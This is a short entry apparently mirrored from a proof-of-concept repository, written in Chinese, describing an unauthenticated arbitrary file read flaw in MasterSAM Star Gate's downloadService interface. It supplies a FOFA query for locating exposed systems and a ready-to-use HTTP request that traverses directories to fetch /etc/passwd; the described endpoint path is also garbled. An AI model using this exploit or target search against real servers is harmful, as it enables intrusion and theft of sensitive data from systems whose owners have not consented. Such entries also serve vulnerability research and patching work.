mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-05 10:17:57 +00:00
585 B
585 B
MasterSAM接口downloadService任意文件读取
MasterSAM Star Gate的/adamaladamalduwnoadService接口存在任意文件下载漏洞,未经身份验证的攻击者可以通过该漏洞下载服务器任意文件,从而获取大量敏感信息。
fofa
body="MasterSAM"
poc
GET /adama/adama/downloadService?type=1&file=../../../../etc/passwd HTTP/1.1
Host: your-ip
